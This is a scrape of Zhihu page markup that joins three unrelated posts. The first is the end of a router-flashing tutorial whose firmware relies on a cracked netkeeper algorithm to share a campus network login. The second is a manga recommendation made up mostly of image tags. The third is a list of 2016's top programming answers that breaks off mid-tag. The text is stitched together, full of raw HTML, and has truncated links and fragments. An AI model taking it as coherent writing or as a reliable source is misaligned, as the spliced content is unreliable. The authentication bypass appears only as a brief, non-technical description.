data-original=&https://pic3.zhimg.com/v2-e1bef0cfad1fa_r.jpg&&&/figure&&p&8、关于去广告,路由器内集成了三种去广告功能,实测koolproxy效果最好,可以去掉电脑和手机端的优酷视频广告,网页广告更是没有问题。&/p&&figure&&img src=&https://pic1.zhimg.com/v2-fb28be53dc1a408ef43bd2e4_b.jpg& data-rawwidth=&1722& data-rawheight=&1446& class=&origin_image zh-lightbox-thumb& width=&1722& data-original=&https://pic1.zhimg.com/v2-fb28be53dc1a408ef43bd2e4_r.jpg&&&/figure&&p&9、关于shad0ws0cks,如果你平时很喜欢看youtube,访问Google,维基百科等等被qiang掉的网站;或是ps4联机控,喜欢联机玩batt!efield 1,全境封锁;或是steam控,想在H1Z1里虐老外,shad0ws0cks都可以比较完美的解决这些问题。填入账号密码开启就好,具体可以自行Google。&/p&&figure&&img src=&https://pic4.zhimg.com/v2-6a968fb657d9b3ce8f30aef_b.jpg& data-rawwidth=&1712& data-rawheight=&1468& class=&origin_image zh-lightbox-thumb& width=&1712& data-original=&https://pic4.zhimg.com/v2-6a968fb657d9b3ce8f30aef_r.jpg&&&/figure&&p&结语:我并不是什么大神,写这个教程只是想帮助那些,希望能在大学寝室用上Wi-Fi方便生活,但是对路由器不熟悉,没有脚本编程能力的小白。可以不需要熟悉路由器,Linux,脚本语言,ssh语言,可以说是最简单的教程了。自己当初为了能在寝室用MacBook(没有网线接口)和 ps4(没法联网联机),求Linux社的学长帮忙弄openwrt固件,折腾了好久,走了不少弯路,花了很多时间。现在有了padavan固件,这一切都变得无比简单,在此,万分感谢破解netkeeper算法的miao学长和开发padavan固件的hiboy大神!&/p&&p&参考链接:&a href=&//link.zhihu.com/?target=http%3A//www.right.com.cn/forum/thread--1.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&[]改华硕[N14U N54U]5G 2G的7620老毛子Padavan固件(百度云同步 aria2 QOS)&/a&&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//www.lianst.com/3300.html& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&斐讯K2最新固件刷机 | 连仕彤博客&/a&&/p&&p&&a href=&//link.zhihu.com/?target=https%3A//github.com/miao1007/Openwrt-NetKeeper& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&miao1007/Openwrt-NetKeeper: [C/C++] Run Netkeeper on OpenWrt Device&/a&&/p&&p&&a href=&//link.zhihu.com/?target=http%3A//blog.csdn.net/azure95/article/details/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&斐讯K1路由器刷入openwrt及通过netkeeper连接校园网 - Azure的博客 - 博客频道 - CSDN.NET&/a&&/p&&p&&br&&/p&&p&&br&&/p&&p&-----------------------------我是分割线,下面是以前折腾netkeeper写的----------------------&/p&&p&我的做法是:&/p&&p&1、去淘宝买一个刷好openwrt的二手路由器,直接让卖家帮忙刷到2.4.7版本,RMB32左右。我的是这款,重邮亲测可用&/p&&p&2、请学校里Linux社的大神帮忙对路由器进行配置,不同的路由器还要找到不同的工具链。参考此文&a href=&//link.zhihu.com/?target=https%3A//github.com/miao1007/Openwrt-NetKeeper& class=& external& target=&_blank& rel=&nofollow noreferrer&&&span class=&invisible&&https://&/span&&span class=&visible&&github.com/miao1007/Ope&/span&&span class=&invisible&&nwrt-NetKeeper&/span&&span class=&ellipsis&&&/span&&/a&。&br&3、然后给ps4插上网线连接到路由器lan口,Wi-Fi连接也可,只是不稳定。&/p&&p&最后,尽情享受吧!&/p&&p&编辑于 16:04&/p&&p&著作权归作者所有&/p&
日更新:此方法只要学校不加心跳,就可以一直用!之前的方法在netkeeper升级到4.7版本后就不能用了,后来一直没人能够做出好用的固件。这里放一个我自己用的斐讯K2的固件吧,附小白包会教程,不用编程。固件的原理是账号拦截,就是与simple netke…
&figure&&img src=&https://pic1.zhimg.com/v2-4c2ab22e2c6e_b.jpg& data-rawwidth=&860& data-rawheight=&481& class=&origin_image zh-lightbox-thumb& width=&860& data-original=&https://pic1.zhimg.com/v2-4c2ab22e2c6e_r.jpg&&&/figure&&p&#多图,多图,多图,流量党真的要来一发吗?#&br&&/p&&p&#本专栏没有特别大的技术含量,但你点击右上方关注会变帅变美。#&br&&/p&大家应该没忘记我吧,这里是曜月,&p&《周刊少年jump》是日本发行量最高的漫画杂志,读者大部分是9岁到20岁的少年,杂志上连载的漫画大多以充满幻想的冒险和热血故事为主,除此之外还有恋爱,运动和其他类型的作品连载。&/p&&p&在《周刊少年jump》的连载名额竞争十分激烈,但对作品的评比却十分简单,“只要有趣就行”(这部番可以去看下《爆漫王》)。因为作品类型很多,所以购买杂志的读者往往不会每部都看,特别是年龄稍大的读者购买杂志大多只是为了看其中的一两部作品。&/p&&p&请看下图,此为《周刊少年jump》的年发行量。&/p&&figure&&img src=&https://pic3.zhimg.com/v2-9cc16818e2_b.jpg& data-rawwidth=&683& data-rawheight=&1157& class=&origin_image zh-lightbox-thumb& width=&683& data-original=&https://pic3.zhimg.com/v2-9cc16818e2_r.jpg&&&/figure&&br&&p&从中可以看出每当一些人气作品完结时《周刊少年jump》的销量都会有所下滑,特别是像《龙珠》《灌篮高手》这些作品完结时,简直效果拔群。&/p&&p&在现在《死神》和《火影忍者》都完结了,只有《op》支撑的现在,《周刊少年jump》迫切想要找到新的漫画来挽回局面,《境界触发者》和《我的英雄学院》都是候选者,但效果好像不太明显。&/p&&p&虽然恋爱漫画不是《周刊少年jump》主推类型,但其读者人群还是不少的,从《i’’s》到《草莓百分百》都有着相当多的粉丝读者,而JUMP史上连载最久的恋爱漫画《伪恋》也完结了,也需要一部新的恋爱漫画了,这时它出现了。&/p&&p&就是我们今天推荐的漫画——&b&《&/b&&b&我们无法一起学习》&/b&&/p&&p&《我们无法一起学习》的作者是筒井大志,之前在《周刊少年jump+》上连载《伪恋》的外传《魔法甜点师小咲!!》。&br&&/p&&p&故事剧情大概是这样,男主唯我成幸是德智体美全面发展的优等生,但家境贫寒,梦想着考入大学之后赚大钱,而这时学校有个大学推荐名额,学校愿意给他这个名额,但是学校有个条件,就是要求她辅导两位美少女学习,她们考入自己理想的大学,她们分别是理科天才的“绪方理珠”和文科天才“古桥文乃”,本来以为是非常简单的任务。&/p&&p&可是呢,文乃说要选理科而她确实理科白痴,理珠要选文科而她却是文科小白。之后三人开始了每天打打闹闹学习白学的搞笑恋爱故事。&/p&&p&下面是第一话,很多图。&/p&&br&&figure&&img src=&https://pic3.zhimg.com/v2-2bb86dfa766cc39ed33b9a_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-2bb86dfa766cc39ed33b9a_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-6ae0dc13ba0_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-6ae0dc13ba0_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-2b4c0bf4716ec6afe228de8f_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-2b4c0bf4716ec6afe228de8f_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-ea7f8caa8bcf78_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-ea7f8caa8bcf78_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-b883b2ca6d4961baa9cc8a_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-b883b2ca6d4961baa9cc8a_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-7dd8109dcf2e5486a8dbe69ee43f5f82_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-7dd8109dcf2e5486a8dbe69ee43f5f82_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-2c209c37cefd28f3bdbf_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-2c209c37cefd28f3bdbf_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-36a3435967ffda553b2427_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-36a3435967ffda553b2427_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-be718fdb9a1ca8bf755079c_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-be718fdb9a1ca8bf755079c_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-70b1dbc41b383b471a68f6_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-70b1dbc41b383b471a68f6_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-e93ab3c73ecbe_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-e93ab3c73ecbe_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-81611eea2c045ba0d2c1_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-81611eea2c045ba0d2c1_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-0ebb223c52b9e7e44de119_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-0ebb223c52b9e7e44de119_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-769b3ed33ad1b92b27e1e2b5fe1a229d_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-769b3ed33ad1b92b27e1e2b5fe1a229d_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-0d98e3c61cec_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-0d98e3c61cec_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-aba4c82d03f52a1d3700c29_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-aba4c82d03f52a1d3700c29_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-022a79a16b3cf9d32c2b036a794106bf_b.jpg& data-rawwidth=&1822& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&1822& data-original=&https://pic4.zhimg.com/v2-022a79a16b3cf9d32c2b036a794106bf_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-024a89fac06befa333f44d6c_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-024a89fac06befa333f44d6c_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-3c1b6382e61ebf50adb0ef1b4edfde98_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-3c1b6382e61ebf50adb0ef1b4edfde98_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-4a1f065b_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-4a1f065b_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-badf2fcbc1857ecf72c52f07_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-badf2fcbc1857ecf72c52f07_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-9abec2ee1ad_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-9abec2ee1ad_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-7f590c3ed05d54debe5994_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-7f590c3ed05d54debe5994_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-d6bfefbf103ac5dd54ea78_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-d6bfefbf103ac5dd54ea78_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-92bb3f87d3e2ac591d9e16c598a5e821_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-92bb3f87d3e2ac591d9e16c598a5e821_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-defbe1f4ebad5f94eb06bd_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-defbe1f4ebad5f94eb06bd_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-ff11e4c9e5d6d_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-ff11e4c9e5d6d_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-5543dbade1cbac1feb6db6_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-5543dbade1cbac1feb6db6_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-8d1cc3ed69f6bac9ffbcd_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-8d1cc3ed69f6bac9ffbcd_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-dbbf53c21b2c4cd371d4214_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-dbbf53c21b2c4cd371d4214_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-621f840d61c0fa1fe8d15_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-621f840d61c0fa1fe8d15_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-c3db4d2c7f1_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-c3db4d2c7f1_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-8a1fc1ce779fe80a70c51bf_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-8a1fc1ce779fe80a70c51bf_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-b1d895ee4a1f362eb39f26b98b9a1c68_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-b1d895ee4a1f362eb39f26b98b9a1c68_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-bb3af8bcf946_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-bb3af8bcf946_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-115d66adde8ffca5c8d88d95e8d9e53a_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-115d66adde8ffca5c8d88d95e8d9e53a_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-042ecc74deb9c95ec6af3c_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-042ecc74deb9c95ec6af3c_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-32d734ceff898c3b336f3a7be2d487a9_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-32d734ceff898c3b336f3a7be2d487a9_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-8dc250da7a29ee9b7b662_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-8dc250da7a29ee9b7b662_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-0c625aca8c37f_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic2.zhimg.com/v2-0c625aca8c37f_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-daee13dd93e0_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-daee13dd93e0_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-cca6f176f1d_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-cca6f176f1d_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-255e15bb61e3330bee5b4_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-255e15bb61e3330bee5b4_r.jpg&&&/figure&&figure&&img src=&https://pic2.zhimg.com/v2-8f091da242dd956e61b0_b.jpg& data-rawwidth=&1822& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&1822& data-original=&https://pic2.zhimg.com/v2-8f091da242dd956e61b0_r.jpg&&&/figure&&figure&&img src=&https://pic1.zhimg.com/v2-9bf5bf6b2b82f3bc0777_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic1.zhimg.com/v2-9bf5bf6b2b82f3bc0777_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-232928dddaaa6f9960bae04ef5b7ce5a_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-232928dddaaa6f9960bae04ef5b7ce5a_r.jpg&&&/figure&&figure&&img src=&https://pic3.zhimg.com/v2-be85f525e2c90be9fa66_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic3.zhimg.com/v2-be85f525e2c90be9fa66_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-2fbfd8e85bc810c742a798_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-2fbfd8e85bc810c742a798_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-2c52e25df8f111c92f66af947835dae7_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-2c52e25df8f111c92f66af947835dae7_r.jpg&&&/figure&&figure&&img src=&https://pic4.zhimg.com/v2-89f78b740caf5fd066f408_b.jpg& data-rawwidth=&911& data-rawheight=&1330& class=&origin_image zh-lightbox-thumb& width=&911& data-original=&https://pic4.zhimg.com/v2-89f78b740caf5fd066f408_r.jpg&&&/figure&&br&&p&-----------------------------&/p&&p&求!关!注!点击右上方关注会变帅变美哟~~~&/p&&p&求!点!赞!点下赞不会怀孕哦~~~(大概吧)&/p&&p&漫画链接:&a href=&https://link.zhihu.com/?target=http%3A//manhua.dmzj.com/womenyiqiwufaxuexi/& class=& wrap external& target=&_blank& rel=&nofollow noreferrer&&我们无法一起学习-我们无法一起学习漫画-我们无法一起学习16在线漫画-&/a&&/p&&p&上期推荐:&a href=&https://zhuanlan.zhihu.com/p/& class=&internal&&漫画推荐:这可能我见过最可爱的恋爱漫画,他们的恋情如冬日的一缕阳光。--《亲爱的花凛》&/a&&/p&
#多图,多图,多图,流量党真的要来一发吗?# #本专栏没有特别大的技术含量,但你点击右上方关注会变帅变美。# 大家应该没忘记我吧,这里是曜月,《周刊少年jump》是日本发行量最高的漫画杂志,读者大部分是9岁到20岁的少年,杂志上连载的漫画大多以充满幻…
&figure&&img src=&https://pic3.zhimg.com/v2-4bef5d339bb7c9d_b.jpg& data-rawwidth=&652& data-rawheight=&419& class=&origin_image zh-lightbox-thumb& width=&652& data-original=&https://pic3.zhimg.com/v2-4bef5d339bb7c9d_r.jpg&&&/figure&前些日子,知乎发布了2016年度一百问:&a href=&https://club.zhihu.com/2017/top100/?utm_campaign=club2017&utm_source=zhihu&utm_medium=recommand&utm_division=zhishiqingnian&utm_content=column& class=&internal&&知乎 2016 年度一百问&/a& ,它涵盖了 2016 年知乎上最热门的 100 个讨论。有了问题,大家自然会想到回答,2016年度最热的回答是什么?或许对于问题,大家更愿意看到高赞/高收藏的回答。&p&考虑到整理整个知乎社区的所有高赞回答是没有意义的,所以这里将会按照话题分开统计;为了方便大家阅读使用,全文将按照各种语言分开进行整理。&b&回答的选取规则是:回答时间在2016年,在各编程语言回答中排名前10的回答。&/b&&/p&&br&&p&&figure&&img src=&https://pic3.zhimg.com/v2-4bef5d339bb7c9d_b.jpg& data-rawwidth=&652& data-rawheight=&419& class=&origin_image zh-lightbox-thumb& width=&652& data-original=&https://pic3.zhimg.com/v2-4bef5d339bb7c9d_r.jpg&&&/figure&&b&&i&&u&1、Python - 2016年度回答&/u&&/i&&/b&&/p&&p&&i&1.1赞同最多的前5个回答&/i&&/p&&p&7904 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Python 的练手项目有哪些值得推荐?&/a&&/p&&p&5946 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何系统地自学 Python? - 知乎用户的回答 - 知乎&/a&&/p&&p&5430 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&零基础应该选择学习 Java、PHP 还是 Python?&/a&&/p&&p&5082 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Python 的练手项目有哪些值得推荐?&/a&&/p&&p&3137 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何入门 Python 爬虫? - 挖数的回答 - 知乎&/a&&/p&&p&&i&1.2收藏最多的前5个回答&/i&&/p&&p&21943 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Python 的练手项目有哪些值得推荐?&/a&&/p&&p&16632 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何系统地自学 Python? - 知乎用户的回答 - 知乎&/a&&/p&&p&11522 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Python 的练手项目有哪些值得推荐?&/a&&/p&&p&8222 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&零基础应该选择学习 Java、PHP 还是 Python?&/a&&/p&&p&4858 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Excel 的 VBA 现在还算是办公利器吗?&/a&&/p&&br&&p&&b&&i&&u&2、Java - 2016年度回答&/u&&/i&&/b&&/p&&p&&i&2.1赞同最多的前5个回答&/i&&/p&&p&5430 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&零基础应该选择学习 Java、PHP 还是 Python?&/a&&/p&&p&2677 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&在北京做Java开发如何月薪达到两万,需要技术水平达到什么程度? - 匿名用户的回答 - 知乎&/a&&/p&&p&2263 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&java初学者,如何学习java? - 天天向上的回答 - 知乎&/a&&/p&&p&2077 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&为什么程序代码被编译成机器码就不能跨平台运行? - 知乎用户的回答 - 知乎&/a&&/p&&p&1893 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Java 的开发效率究竟比 C++ 高在哪里?&/a&&/p&&p&&i&2.2收藏最多的前5个回答&/i&&/p&&p&4399 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&在北京做Java开发如何月薪达到两万,需要技术水平达到什么程度? - 匿名用户的回答 - 知乎&/a&&/p&&p&2105 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&java初学者,如何学习java? - 天天向上的回答 - 知乎&/a&&/p&&p&1811 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&当你学会了什么之后感觉自己的编程算是入门了? - chapman zhang 的回答 - 知乎&/a&&/p&&p&1746 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&零基础应该选择学习 Java、PHP 还是 Python?&/a&&/p&&p&1712 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何去阅读并学习一些优秀的开源框架的源码? - phodal 的回答 - 知乎&/a&&/p&&br&&p&&b&&i&&u&3、JavaScript - 2016年度回答&/u&&/i&&/b&&/p&&p&&i&3.1赞同最多的前5个回答&/i&&/p&&p&2382 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Web 前端怎样入门? - 颜什么都不记得适的回答 - 知乎&/a&&/p&&p&2015 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何入门微信小程序开发,有哪些学习资料? - 初雪的回答 - 知乎&/a&&/p&&p&1847 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&有哪些短小却令人惊叹的 JavaScript 代码?&/a&&/p&&p&1544 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&为什么vue的更新记录不能有中文,中文文档也一直滞后? - 尤雨溪的回答 - 知乎&/a&&/p&&p&1491 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&关于后端程序员写前端用什么框架更好? - 毛文强的回答 - 知乎&/a&&/p&&p&&i&3.2收藏最多的前5个回答&/i&&/p&&p&5458 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Web 前端怎样入门? - 颜什么都不记得适的回答 - 知乎&/a&&/p&&p&4962 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何入门微信小程序开发,有哪些学习资料? - 初雪的回答 - 知乎&/a&&/p&&p&3360 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何入门微信小程序开发,有哪些学习资料? - 贺嘉的回答 - 知乎&/a&&/p&&p&2105 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&关于后端程序员写前端用什么框架更好? - 毛文强的回答 - 知乎&/a&&/p&&p&1951 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&关于 JavaScript 的好书有哪些?&/a&&/p&&br&&p&&b&&i&&u&4、C - 2016年度回答&/u&&/i&&/b&&/p&&p&&i&4.1赞同最多的前5个回答&/i&&/p&&p&4141 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&学会了 C 语言真的可以开发出很多东西吗?&/a&&/p&&p&2386 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&你用 C 语言做过哪些有意思的事?&/a&&/p&&p&2257 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&Windows 上最小的“HelloWorld.exe”能有多小?&/a&&/p&&p&2167 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&对于一个大一计科新生,有什么代码行数在500~1000的程序(c语言)可以试着写来练手? - 童晶的回答 - 知乎&/a&&/p&&p&2077 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&为什么程序代码被编译成机器码就不能跨平台运行? - 知乎用户的回答 - 知乎&/a&&/p&&p&&i&4.2收藏最多的前5个回答&/i&&/p&&p&8712 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&学会了 C 语言真的可以开发出很多东西吗?&/a&&/p&&p&3160 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&对于一个大一计科新生,有什么代码行数在500~1000的程序(c语言)可以试着写来练手? - 童晶的回答 - 知乎&/a&&/p&&p&1882 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&你用 C 语言做过哪些有意思的事?&/a&&/p&&p&1387 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&怎么能让LOL在运行中闪退? - 郝艺益的回答 - 知乎&/a&&/p&&p&1278 &a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何阅读《深入理解计算机系统》这本书? - 等灯等灯的回答 - 知乎&/a&&/p&&br&&p&&b&&i&&u&5、C++ - 2016年度回答&/u&&/i&&/b&&/p&&p&&i&5.1赞同最多的前5个回答&/i&&/p&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&Java 的开发效率究竟比 C++ 高在哪里?&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&计算机领域有哪些像《鸟哥的Linux私房菜》这样通俗易懂的学习资料? - vczh 的回答 - 知乎&/a&&a href=&https://www.zhihu.com/question//answer/& class=&internal&&如何在一个月内提高C++水平? - 空明流转的回答 - 知乎&/a&&a 